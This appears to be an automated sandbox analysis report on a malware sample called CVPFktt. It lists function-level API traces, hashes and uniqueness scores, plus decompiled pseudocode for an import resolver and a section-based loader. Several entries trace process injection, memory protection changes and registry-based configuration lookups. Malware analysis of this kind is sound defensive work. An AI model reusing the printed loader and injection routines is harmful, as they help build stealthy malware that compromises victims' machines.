Opcode Fuzzy Hash: 14d46147fda1bad7c1b9f83ad616fa8c1c1e1239eb8c469f12de2b7bb2653a03
Instruction Fuzzy Hash: 16319E71901118BFEB20AFB59D88DAF7EBCFA08355711013AF510F22A0E738DE409B69

Uniqueness

Uniqueness Score: 100.00%

Function 00411B5D, Relevance: 15.1, APIs: 10, Instructions: 109
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__mtterm.LIBCMT ref: 00411B71

Part of subcall function 004118AA: _free.LIBCMT ref: 004121EB

__init_pointers.LIBCMT ref: 00411C23
RtlEncodePointer.NTDLL(?,00410390), ref: 00411C34
RtlEncodePointer.NTDLL(?,00410390), ref: 00411C41
RtlEncodePointer.NTDLL(?,00410390), ref: 00411C4E
RtlEncodePointer.NTDLL(?,00410390), ref: 00411C5B
RtlDecodePointer.NTDLL(00411A2E,?,00410390), ref: 00411C7C
__calloc_crt.LIBCMT ref: 00411C91
RtlDecodePointer.NTDLL(00000000,?,00410390), ref: 00411CAB

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: Pointer$Encode$Decode$__calloc_crt__init_pointers__mtterm_free
String ID:
API String ID: 1408498856-0
Opcode ID: 5440dd587aacc09a4c1e9c00c766c3956eb329abb89cb46c26a3256130731c57
Instruction ID: 794882b7247a5a6ce7239db259cf4417506ea3c008961ca526c69325a088d051
Opcode Fuzzy Hash: 5440dd587aacc09a4c1e9c00c766c3956eb329abb89cb46c26a3256130731c57
Instruction Fuzzy Hash: 27317231E44250ABD730EF75AE086963FE4AB443A4B50453BE914E36B1E77884C2EF5C

Uniqueness

Uniqueness Score: 100.00%

Function 00401E55, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401E55(void* __ebx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed short _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _t33;
				intOrPtr _t35;
				struct HINSTANCE__* _t36;
				intOrPtr _t39;
				CHAR* _t43;
				_Unknown_base(*)()* _t44;
				void* _t51;
				intOrPtr _t52;
				signed short _t53;
				intOrPtr* _t56;
				signed short _t58;
				CHAR* _t59;
				CHAR* _t61;
				signed short* _t63;
				void* _t64;
				signed short _t71;

				_t51 = __ebx;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				_v12 = _v12 & 0x00000000;
				if(_t33 == 0) {
					L28:
					return _v12;
				}
				_t56 = _t33 + __ebx;
				_t35 =  *((intOrPtr*)(_t56 + 0xc));
				_v8 = _t56;
				if(_t35 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t61 = _t35 + _t51;
					_t36 = LoadLibraryA(_t61); // executed
					_v20 = _t36;
					if(_t36 == 0) {
						break;
					}
					_v16 = _v16 & 0x00000000;
					memset(_t61, 0, lstrlenA(_t61));
					_t52 =  *_t56;
					_t39 =  *((intOrPtr*)(_t56 + 0x10));
					_t64 = _t64 + 0xc;
					if(_t52 != 0) {
						L6:
						_t63 = _t52 + _t51;
						_t53 =  *_t63;
						if(_t53 == 0) {
							L23:
							_t35 =  *((intOrPtr*)(_t56 + 0x20));
							_t56 = _t56 + 0x14;
							_v8 = _t56;
							if(_t35 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v24 = _t39 - _t63 + _t51;
						_t71 = _t53;
						L8:
						L8:
						if(_t71 < 0) {
							if(_t53 < _t51 || _t53 >=  *((intOrPtr*)(_a4 + 0x50)) + _t51) {
								_t58 = 0;
								_v16 =  *_t63 & 0x0000ffff;
							} else {
								_t58 = _t53;
							}
						} else {
							_t58 = _t53 + _t51;
						}
						_t19 = _t58 + 2; // 0x2
						_t43 = _t19;
						if(_t58 == 0) {
							_t43 = _v16 & 0x0000ffff;
						}
						_t44 = GetProcAddress(_v20, _t43);
						_v28 = _t44;
						if(_t44 == 0) {
							goto L21;
						}
						if(_t58 != 0) {
							_t59 = _t58 + 2;
							memset(_t59, 0, lstrlenA(_t59));
							_t64 = _t64 + 0xc;
						}
						 *(_v24 + _t63) = _v28;
						_t63 =  &(_t63[2]);
						_t53 =  *_t63;
						if(_t53 != 0) {
							goto L8;
						} else {
							L22:
							_t56 = _v8;
							goto L23;
						}
						L21:
						_v12 = 0x7f;
						goto L22;
					}
					_t52 = _t39;
					if(_t39 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v12 = 0x7e;
				goto L26;
			}

0x00401e55
0x00401e5e
0x00401e64
0x00401e6a
0x00401f6b
0x00401f6f
0x00401f6f
0x00401e71
0x00401e74
0x00401e79
0x00401e7c
0x00401f6a
0x00000000
0x00401f6a
0x00401e83
0x00401e83
0x00401e87
0x00401e8f
0x00401e92
0x00000000
0x00000000
0x00401e98
0x00401ea7
0x00401eac
0x00401eae
0x00401eb1
0x00401eb6
0x00401ec2
0x00401ec2
0x00401ec5
0x00401ec9
0x00401f4f
0x00401f4f
0x00401f52
0x00401f57
0x00401f5a
0x00000000
0x00000000
0x00401f69
0x00000000
0x00401f69
0x00401ed3
0x00401ed6
0x00000000
0x00401ed8
0x00401ed8
0x00401ee1
0x00401ef6
0x00401ef8
0x00401eef
0x00401eef
0x00401eef
0x00401eda
0x00401eda
0x00401eda
0x00401efd
0x00401efd
0x00401f00
0x00401f02
0x00401f02
0x00401f0a
0x00401f12
0x00401f15
0x00000000
0x00000000
0x00401f19
0x00401f1b
0x00401f29
0x00401f2e
0x00401f2e
0x00401f37
0x00401f3a
0x00401f3d
0x00401f41
0x00000000
0x00401f43
0x00401f4c
0x00401f4c
0x00000000
0x00401f4c
0x00401f45
0x00401f45
0x00000000
0x00401f45
0x00401eba
0x00401ebc
0x00000000
0x00000000
0x00000000
0x00401ebc
0x00401f62
0x00000000

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?,?,00000000), ref: 00401E87
lstrlenA.KERNEL32(?), ref: 00401E9D
memset.NTDLL ref: 00401EA7
GetProcAddress.KERNEL32(?,00000002), ref: 00401F0A
lstrlenA.KERNEL32(-00000002), ref: 00401F1F
memset.NTDLL ref: 00401F29

Strings

~, xrefs: 00401F62

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: 8617e8386e33f7e298d54bece3d8a3db74937852f1ad87536d4a1256177b8bae
Instruction ID: 50766972cb5dd8b3533ee8dcda7191eab9a9dcb0ca197332ad186426acb597ad
Opcode Fuzzy Hash: 8617e8386e33f7e298d54bece3d8a3db74937852f1ad87536d4a1256177b8bae
Instruction Fuzzy Hash: FC313C75A012169BDB14CF59C940BAEB7B9BF44305F10407EED05F72A0E738EA45CB98

Uniqueness

Uniqueness Score: 0.36%

Function 001C93D9, Relevance: 10.6, APIs: 7, Instructions: 110
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001C719A: GetProcAddress.KERNEL32(6F57775A,00000318), ref: 001C71BF

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 001C9412
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 001C94FD

Part of subcall function 001C719A: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 001C7345

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 001C9448
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 001C9454
lstrcmpi.KERNEL32(?,00000000), ref: 001C9491
StrChrA.SHLWAPI(?,0000002E), ref: 001C949A
lstrcmpi.KERNEL32(?,00000000), ref: 001C94AC

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressProc
String ID:
API String ID: 1783538721-0
Opcode ID: ae3e40ce6a5ad424f0890ec043416235deb6788ceaee1977dc29367acadf1e36
Instruction ID: 71520fd5bc5d41bba65571e3b6855ed5d55c66d0f560656f8a57feb65ce1313c
Opcode Fuzzy Hash: ae3e40ce6a5ad424f0890ec043416235deb6788ceaee1977dc29367acadf1e36
Instruction Fuzzy Hash: 3431AF71508352ABD3258F11CD88F2BBBE8FF98B54F10491DF984A7280D774E945CBA6

Uniqueness

Uniqueness Score: 1.23%

Function 001CE470, Relevance: 10.6, APIs: 7, Instructions: 82
sleepthreadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D54F9: memset.NTDLL ref: 001D5503

OpenEventA.KERNEL32(00000002,00000000,001E6228,?,00000000,00000000,?,001C5161,?,00000000,?,?,?,?,?,001CEF2B), ref: 001CE4FE
SetEvent.KERNEL32(00000000,?,001C5161,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001CE50B
Sleep.KERNEL32(00000BB8,?,001C5161,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001CE516
ResetEvent.KERNEL32(00000000,?,001C5161,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001CE51D
CloseHandle.KERNEL32(00000000,?,001C5161,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001CE524
GetShellWindow.USER32 ref: 001CE52F
GetWindowThreadProcessId.USER32(00000000), ref: 001CE536

Part of subcall function 001C347D: RegCloseKey.ADVAPI32(?,?,004F0053), ref: 001C3500

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: 62598d6ceb1cc48473809e27aed25ad8bf86a602fdd0ae4a3d45b18a805654e8
Instruction ID: 84e15649f3c0d136fb7375691cc7a661864a8d82d57b4d797bf09906509a96fd
Opcode Fuzzy Hash: 62598d6ceb1cc48473809e27aed25ad8bf86a602fdd0ae4a3d45b18a805654e8
Instruction Fuzzy Hash: E5219232100199ABC714ABE5FCCDD2F7BADEBA67A5741400DF201CB560DB39D8818771

Uniqueness

Uniqueness Score: 100.00%

Function 001CD862, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68
registryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001DB50A: lstrlen.KERNEL32(?,00000000,001DDCCE,00000027,001E6114,?,00000000,?,?,001DDCCE,Local\,00000001,?,001CF00E,?,00000000), ref: 001DB540
Part of subcall function 001DB50A: lstrcpy.KERNEL32(00000000,00000000), ref: 001DB564
Part of subcall function 001DB50A: lstrcat.KERNEL32(00000000,00000000), ref: 001DB56C

RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020119,?,?,Software\AppDataLow\Software\Microsoft\,00000000), ref: 001CD89B
RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020019,?,?,Software\AppDataLow\Software\Microsoft\,00000000), ref: 001CD8AF
RegCloseKey.KERNELBASE(?,?,Software\AppDataLow\Software\Microsoft\,00000000), ref: 001CD8F8

Strings

Client64, xrefs: 001CD8E1
Software\AppDataLow\Software\Microsoft\, xrefs: 001CD870
Client32, xrefs: 001CD8BD

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
API String ID: 4131162436-710576342
Opcode ID: 8fd07ad354392891319bf2583e456a8048eb54455daac4858ad1ad1a85559b29
Instruction ID: e51ce61505e9cefac22cf877b3729c7062534b5318aad48740406f0bdad86bc8
Opcode Fuzzy Hash: 8fd07ad354392891319bf2583e456a8048eb54455daac4858ad1ad1a85559b29
Instruction Fuzzy Hash: 6911607290025CFEDB11AFA5ECC1DAEBBBCEB25358B1040B9F904A6151E770DE059B60

Uniqueness

Uniqueness Score: 100.00%

Function 001CA5C4, Relevance: 9.1, APIs: 6, Instructions: 125
threadsynchronizationinjectionUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 001CA5E7

Part of subcall function 001C2E4E: GetModuleHandleA.KERNEL32(4E52454B), ref: 001C2E6F
Part of subcall function 001C2E4E: GetProcAddress.KERNEL32(00000000,6F577349), ref: 001C2E88
Part of subcall function 001C2E4E: OpenProcess.KERNEL32(?,00000000,?), ref: 001C2EA5
Part of subcall function 001C2E4E: IsWow64Process.KERNEL32(?,?), ref: 001C2EB6
Part of subcall function 001C2E4E: FindCloseChangeNotification.KERNELBASE(?,?,?), ref: 001C2EC9

ResumeThread.KERNEL32(?,001E60C4,?,00000000), ref: 001CA6A1
WaitForSingleObject.KERNEL32(00000064), ref: 001CA6AF
SuspendThread.KERNEL32(?), ref: 001CA6C2

Part of subcall function 001D3E77: memset.NTDLL ref: 001D4139

ResumeThread.KERNELBASE(?), ref: 001CA745

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
String ID:
API String ID: 2397206891-0
Opcode ID: 33923c246f8fc5230b4ae745f853a6adc8a6a4bb7829f8a10cff911d0980984e
Instruction ID: 6eff3834ad9d07e0f64c11d41c48004156b91b6c27eb03efa9e8c10d154e5a67
Opcode Fuzzy Hash: 33923c246f8fc5230b4ae745f853a6adc8a6a4bb7829f8a10cff911d0980984e
Instruction Fuzzy Hash: 7F418A7190024CABDF229FA4CC85FAE7BB9FF24348F544429F915A61A0C735DE95CB12

Uniqueness

Uniqueness Score: 100.00%

Function 004015E5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015E5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				struct HINSTANCE__* _t25;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E004018B8("true");
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x404104; // 0x0
					_t25 = GetModuleHandleA(_t23 + 0x405014); // executed
					_t48 = _t25;
					_t26 =  *0x404104; // 0x0
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t26 + 0x40514c); // executed
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E004010A3(_t54);
					} else {
						_t30 =  *0x404104; // 0x0
						_t32 = GetProcAddress(_t48, _t30 + 0x40515c); // executed
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x404104; // 0x0
							_t35 = GetProcAddress(_t48, _t33 + 0x40516f); // executed
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x404104; // 0x0
								_t38 = GetProcAddress(_t48, _t36 + 0x405184); // executed
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x404104; // 0x0
									_t41 = GetProcAddress(_t48, _t39 + 0x40519a); // executed
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0040150E(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x004015f4
0x004015f8
0x004016ba
0x004015fe
0x004015fe
0x0040160a
0x00401616
0x00401618
0x00401625
0x0040162c
0x00401630
0x00401633
0x004016b2
0x004016b3
0x00401635
0x00401635
0x00401642
0x00401646
0x00401649
0x00000000
0x0040164b
0x0040164b
0x00401658
0x0040165c
0x0040165f
0x00000000
0x00401661
0x00401661
0x0040166e
0x00401672
0x00401675
0x00000000
0x00401677
0x00401677
0x00401684
0x00401688
0x0040168b
0x00000000
0x0040168d
0x00401693
0x00401698
0x0040169f
0x004016a6
0x004016a9
0x00000000
0x004016ab
0x004016ae
0x004016ae
0x004016a9
0x0040168b
0x00401675
0x0040165f
0x00401649
0x00401633
0x004016c8

APIs

Part of subcall function 004018B8: HeapAlloc.KERNEL32(00000000,?,004011B3,00000028,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 004018C4

GetModuleHandleA.KERNELBASE(?,?,00000000,?,?,?,?,?,004017DC,?,?,?,00000000,00000002,?,?), ref: 0040160A
GetProcAddress.KERNELBASE(00000000,?), ref: 0040162C
GetProcAddress.KERNELBASE(00000000,?), ref: 00401642
GetProcAddress.KERNELBASE(00000000,?), ref: 00401658
GetProcAddress.KERNELBASE(00000000,?), ref: 0040166E
GetProcAddress.KERNELBASE(00000000,?), ref: 00401684

Part of subcall function 0040150E: NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,779F4EE0,00000000,00000000,00000000), ref: 0040156B
Part of subcall function 0040150E: memset.NTDLL ref: 0040158D

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 1376edf29495117af9cf5efb9f1e0da83714114546af44943795de595d69615b
Instruction ID: 388949a7fc42922ccdd78a3fef886aa98b15fe29387d4124fd181fcb2cf610db
Opcode Fuzzy Hash: 1376edf29495117af9cf5efb9f1e0da83714114546af44943795de595d69615b
Instruction Fuzzy Hash: C8219FB160020AAFD710EF69CD84E6B77FCEB44344704457AE609EB361E775E9418FA8

Uniqueness

Uniqueness Score: 0.28%

Function 001C2C9D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

GetModuleHandleA.KERNEL32(4C44544E,?,?,00000000,?,?,?,?,001D3F87,?,?,?,?,00000000), ref: 001C2CC2
GetProcAddress.KERNEL32(00000000,7243775A), ref: 001C2CE4
GetProcAddress.KERNEL32(00000000,614D775A), ref: 001C2CFA
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 001C2D10
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 001C2D26
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 001C2D3C

Part of subcall function 001C11F3: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 001C1250
Part of subcall function 001C11F3: memset.NTDLL ref: 001C1274

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 83fbc537e0d64b29e80eb198eeda2b3cc6181c7277f28ba0151797e785b2d3b3
Instruction ID: aa45292764dac0258b6d1681562526348a89e55b842b1c7e8afee01ee1f3639f
Opcode Fuzzy Hash: 83fbc537e0d64b29e80eb198eeda2b3cc6181c7277f28ba0151797e785b2d3b3
Instruction Fuzzy Hash: 332160B1500246EFD720DFA9CC84F6A77ECFB64740B05486AE44ACB611EB74E9018B61

Uniqueness

Uniqueness Score: 0.28%

Function 001D98EF, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionUNIQUE

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,001DDB80,00000000,001D9AB2), ref: 001D9906
QueueUserAPC.KERNELBASE(001DDB80,00000000,001D2FB5,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D991B
GetLastError.KERNEL32(00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9926
TerminateThread.KERNEL32(00000000,00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9930
CloseHandle.KERNEL32(00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9937
SetLastError.KERNEL32(00000000,?,?,001DDB80,001D2FB5,00000000,?), ref: 001D9940

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 3b14862ddebae759a7fc3be6ff0aeeb6d72c7abd5f6e4ee44a7b0fa49611ca45
Instruction ID: a1157a2ae937b643d5985ca39e714e714bddea2d5657d3166d5db6aee27be270
Opcode Fuzzy Hash: 3b14862ddebae759a7fc3be6ff0aeeb6d72c7abd5f6e4ee44a7b0fa49611ca45
Instruction Fuzzy Hash: 19F08C322002A5ABC7231FE0ACA8F9FBB6DFB08B61F010404F74599570C7358980DB95

Uniqueness

Uniqueness Score: 100.00%

Function 001D2DD2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcpy.NTDLL(001E6228,001C1796,00000018,00000000,00000000,779F4D40,001C1796,?,?,?,00000000), ref: 001D2DE8
GetModuleHandleA.KERNEL32(NTDLL.DLL,00000000,00000000,779F4D40,001C1796,?,?,?,00000000,?,?,?,?,?,001CEF2B,?), ref: 001D2E0D
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001D2E1D

Strings

KERNEL32.DLL, xrefs: 001D2E18
NTDLL.DLL, xrefs: 001D2DF6

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HandleModule$memcpy
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 1864057842-633099880
Opcode ID: a607b9aae0b8c1c6c513747a73748ebed8f56ba84e2c2b225717d1828a3aafc6
Instruction ID: 7fc552e1fd382f3be3f8c6748c868ca3965124e2c0e766456a851af9daf7ff7d
Opcode Fuzzy Hash: a607b9aae0b8c1c6c513747a73748ebed8f56ba84e2c2b225717d1828a3aafc6
Instruction Fuzzy Hash: 44012D32A043819BE7119F94EC81B1EB7D5BBB4750F50053BF114972D0E7B0E885D711

Uniqueness

Uniqueness Score: 1.15%

Function 00400154, Relevance: 8.3, APIs: 4, Instructions: 2295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364204a1b6d46ea44be32a4704cdeacdee48c741fcd581891a0c797c57bd2962
Instruction ID: 960d5bdba3e0a42045e38b10332ec08647d0449baa68113ba80d9b1ad0745c53
Opcode Fuzzy Hash: 364204a1b6d46ea44be32a4704cdeacdee48c741fcd581891a0c797c57bd2962
Instruction Fuzzy Hash: E551FB6280E3C04FDB138B719D646657FB4AE53251B0A41EBD4C1EB1E3E26C8C4AC326

Uniqueness

Uniqueness Score: 0.00%

Function 00400255, Relevance: 8.1, APIs: 4, Instructions: 2142memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401018
VirtualProtect.KERNELBASE(00000000,00000001,0000000C,0000000C,00000000,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 0040105B
GetLastError.KERNEL32(?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401065
LeaveCriticalSection.KERNEL32(?,00000000,?,015485CC,015485A8,?,00000000,00401B32,015485A8,00000000), ref: 00401093

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: e7139cad7700341563ad69a0da7d29a57eb3a01568a15b8cd30d9a0efede73e9
Instruction ID: 5d3c5eb6cb6cd562aa9a4f8357a384cb4cb4690097b0402cee50601ce7c54b8f
Opcode Fuzzy Hash: e7139cad7700341563ad69a0da7d29a57eb3a01568a15b8cd30d9a0efede73e9
Instruction Fuzzy Hash: 2631696150E3C05FD7238B349C64A667FB4AF53355F0A85EBE085EB1A3E2388D48C726

Uniqueness

Uniqueness Score: 2.12%

Function 001C7B8F, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001DF4F8: RegCreateKeyA.ADVAPI32(80000001,03E588A0,?), ref: 001DF50D
Part of subcall function 001DF4F8: lstrlen.KERNEL32(03E588A0,00000000,00000000,00000000,?,001DE01D,00000000,?), ref: 001DF53B

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BC7
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C7BDB
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill), ref: 001C7BF5
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C11
RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,001C67ED,Kill,?,?), ref: 001C7C1F

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: cfa6a8fa5397114113a413115923138a27883c73cd6b9ff68003bca8bdb9f544
Instruction ID: 814aefe384a6e57e8b4222ab1f5388a8653de864dc9c322f1262108ef29a05d9
Opcode Fuzzy Hash: cfa6a8fa5397114113a413115923138a27883c73cd6b9ff68003bca8bdb9f544
Instruction Fuzzy Hash: D41116B250018ABFDB119F94DC84CAE7B7EFB98358B15042AF501AB160D7B19E919B60

Uniqueness

Uniqueness Score: 12.89%

Function 001C2E4E, Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderUNIQUE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(4E52454B), ref: 001C2E6F
GetProcAddress.KERNEL32(00000000,6F577349), ref: 001C2E88
OpenProcess.KERNEL32(?,00000000,?), ref: 001C2EA5
IsWow64Process.KERNEL32(?,?), ref: 001C2EB6
FindCloseChangeNotification.KERNELBASE(?,?,?), ref: 001C2EC9

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
String ID:
API String ID: 1712524627-0
Opcode ID: c1e8843b56f5379d8213409bd23d6720adf76dbf3ce169630d1942dd8ea8cb30
Instruction ID: 27e9d4e56206a3e577e1f0e5b2981d4133f2dec30741daf86a0d054fb6ae811e
Opcode Fuzzy Hash: c1e8843b56f5379d8213409bd23d6720adf76dbf3ce169630d1942dd8ea8cb30
Instruction Fuzzy Hash: 8A014C71900284EFCB12DFD5EC88D9E7BACFBA4391724442AF505EB550E7709A81CB60

Uniqueness
